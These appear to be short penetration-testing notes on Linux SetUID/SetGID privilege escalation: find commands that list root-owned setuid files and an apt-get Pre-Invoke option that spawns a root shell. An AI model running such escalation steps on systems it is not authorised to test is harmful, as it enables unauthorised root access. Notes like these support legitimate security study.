Special Permissions

SetUID

Sample Exploitation

1. Find files that has setuid

   $ find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

2. Find files that has setgid

   $ find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null

3. Search in gtfobin or reverse engineer, find vuln, exploit. Assuming the apt-update has setuid

   $ sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh